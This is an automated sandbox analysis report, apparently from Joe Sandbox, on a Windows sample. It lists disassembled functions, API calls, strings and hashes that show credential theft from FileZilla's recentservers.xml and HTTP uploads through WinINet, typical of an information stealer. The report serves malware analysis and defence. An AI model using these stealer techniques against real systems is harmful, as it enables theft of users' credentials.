                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 337689325-555421843
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1bd7da4c73d5c5b7d44efba9374487cf637e282499a3084afd9b1c939b7d412d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bd7da4c73d5c5b7d44efba9374487cf637e282499a3084afd9b1c939b7d412d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69
                                                                                                                                                                                                                                                                                                                                  Function 00419BB0 Relevance: 66.7, APIs: 33, Strings: 5, Instructions: 212libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 960 419bb0-419bc4 call 419aa0 963 419de3-419e42 LoadLibraryA * 5 960->963 964 419bca-419dde call 419ad0 GetProcAddress * 21 960->964 966 419e44-419e58 GetProcAddress 963->966 967 419e5d-419e64 963->967 964->963 966->967 969 419e96-419e9d 967->969 970 419e66-419e91 GetProcAddress * 2 967->970 971 419eb8-419ebf 969->971 972 419e9f-419eb3 GetProcAddress 969->972 970->969 973 419ec1-419ed4 GetProcAddress 971->973 974 419ed9-419ee0 971->974 972->971 973->974 975 419f11-419f12 974->975 976 419ee2-419f0c GetProcAddress * 2 974->976 976->975
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079B8A0), ref: 00419BF1
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079B8B8), ref: 00419C0A
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079B7C8), ref: 00419C22
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BBE8), ref: 00419C3A
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BE88), ref: 00419C53
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00796040), ref: 00419C6B
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007946E0), ref: 00419C83
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00794980), ref: 00419C9C
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BC00), ref: 00419CB4
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BBA0), ref: 00419CCC
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BDB0), ref: 00419CE5
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BD80), ref: 00419CFD
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007949A0), ref: 00419D15
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BD68), ref: 00419D2E
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BBB8), ref: 00419D46
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007946A0), ref: 00419D5E
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BD98), ref: 00419D77
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BD08), ref: 00419D8F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00794700), ref: 00419DA7
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BDC8), ref: 00419DC0
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00794900), ref: 00419DD8
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079BC60,?,00416CA0), ref: 00419DEA
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079BCF0,?,00416CA0), ref: 00419DFB
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079BC30,?,00416CA0), ref: 00419E0D
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079BD20,?,00416CA0), ref: 00419E1F
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079BDE0,?,00416CA0), ref: 00419E30
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75070000,0079BC78), ref: 00419E52
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75FD0000,0079BCD8), ref: 00419E73
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75FD0000,0079BC18), ref: 00419E8B
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,0079BE70), ref: 00419EAD
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74E50000,00794720), ref: 00419ECE
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76E80000,00796050), ref: 00419EEF
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419F06
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                  • String ID: Gy$@`y$NtQueryInformationProcess$P`y$Fy
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-4086925976
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62
                                                                                                                                                                                                                                                                                                                                  Function 00405150 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569stringnetworkmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 1401 405150-40527d call 41aab0 call 404800 call 419030 call 41ade0 lstrlenA call 41ade0 call 419030 call 41aa50 * 5 InternetOpenA StrCmpCA 1424 405286-40528a 1401->1424 1425 40527f 1401->1425 1426 405290-4053a3 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41ac30 call 41acc0 call 41abb0 call 41ab10 * 3 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 1424->1426 1427 405914-4059a9 InternetCloseHandle call 418b20 * 2 call 41ad50 * 4 call 41aab0 call 41ab10 * 5 call 401550 call 41ab10 1424->1427 1425->1424 1426->1427 1490 4053a9-4053b7 1426->1490 1491 4053c5 1490->1491 1492 4053b9-4053c3 1490->1492 1493 4053cf-405401 HttpOpenRequestA 1491->1493 1492->1493 1494 405907-40590e InternetCloseHandle 1493->1494 1495 405407-405881 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ade0 lstrlenA call 41ade0 lstrlenA GetProcessHeap HeapAlloc call 41ade0 lstrlenA call 41ade0 memcpy call 41ade0 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 HttpSendRequestA call 418b20 1493->1495 1494->1427 1649 405886-4058b0 InternetReadFile 1495->1649 1650 4058b2-4058b9 1649->1650 1651 4058bb-405901 InternetCloseHandle 1649->1651 1650->1651 1652 4058bd-4058fb call 41acc0 call 41abb0 call 41ab10 1650->1652 1651->1494 1652->1649
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004051E3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419030: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,007A20A8), ref: 00405275
                                                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
                                                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,007A2108,?,007A1498,00000000,00000000,00400100,00000000), ref: 004053F4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,007A21A8,00000000,?,00798E00,00000000,?,00421B0C,00000000,?,0041541F), ref: 00405787
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040579B
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004057B3
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004057C8
                                                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 004057DF
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
                                                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?), ref: 00405806
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405818
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
                                                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?), ref: 00405841
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
                                                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
                                                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405901
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040590E
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405918
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                                                                                                                                  • String ID: ------$"$"$"$--$------$------$------$X z
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2744873387-3376360063
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97839a5b0e6357285e4f7ad1782622175dc46bd3eb6cb963cab3546853bfce7d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 17d44de56e64bdd087ca749706e31b97a9426ac18b0a434e790be536538602ee
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97839a5b0e6357285e4f7ad1782622175dc46bd3eb6cb963cab3546853bfce7d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34321071A22118ABCB14EBA1DC65FEE7379BF54714F00419EF10662092EF387A98CF59
                                                                                                                                                                                                                                                                                                                                  Function 004059B0 Relevance: 51.2, APIs: 20, Strings: 9, Instructions: 493networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 1660 4059b0-405a6b call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 1675 405a74-405a78 1660->1675 1676 405a6d 1660->1676 1677 406013-40603b InternetCloseHandle call 41ade0 call 40a210 1675->1677 1678 405a7e-405bf6 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 1675->1678 1676->1675 1687 40607a-4060e5 call 418b20 * 2 EntryPoint call 41ab10 * 5 call 401550 call 41ab10 1677->1687 1688 40603d-406075 call 41ab30 call 41acc0 call 41abb0 call 41ab10 1677->1688 1678->1677 1760 405bfc-405c0a 1678->1760 1688->1687 1761 405c18 1760->1761 1762 405c0c-405c16 1760->1762 1763 405c22-405c55 HttpOpenRequestA 1761->1763 1762->1763 1764 406006-40600d InternetCloseHandle 1763->1764 1765 405c5b-405f7f call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41ade0 lstrlenA call 41ade0 lstrlenA GetProcessHeap HeapAlloc call 41ade0 lstrlenA call 41ade0 memcpy call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 HttpSendRequestA 1763->1765 1764->1677 1874 405f85-405faf InternetReadFile 1765->1874 1875 405fb1-405fb8 1874->1875 1876 405fba-406000 InternetCloseHandle 1874->1876 1875->1876 1877 405fbc-405ffa call 41acc0 call 41abb0 call 41ab10 1875->1877 1876->1764 1877->1874
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,007A20A8), ref: 00405A63
                                                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,007A2028,00000000,?,00798E00,00000000,?,00421B4C), ref: 00405EC1
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?), ref: 00405F4E
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00406000
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,007A2108,?,007A1498,00000000,00000000,00400100,00000000), ref: 00405C48
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00406017
                                                                                                                                                                                                                                                                                                                                  • EntryPoint.HWWXZRWPEL ref: 0040609A
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackEntryFilePointProcessReadSend
                                                                                                                                                                                                                                                                                                                                  • String ID: "$"$( z$------$------$------$S`A$S`A$X z
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1403429951-3719581160
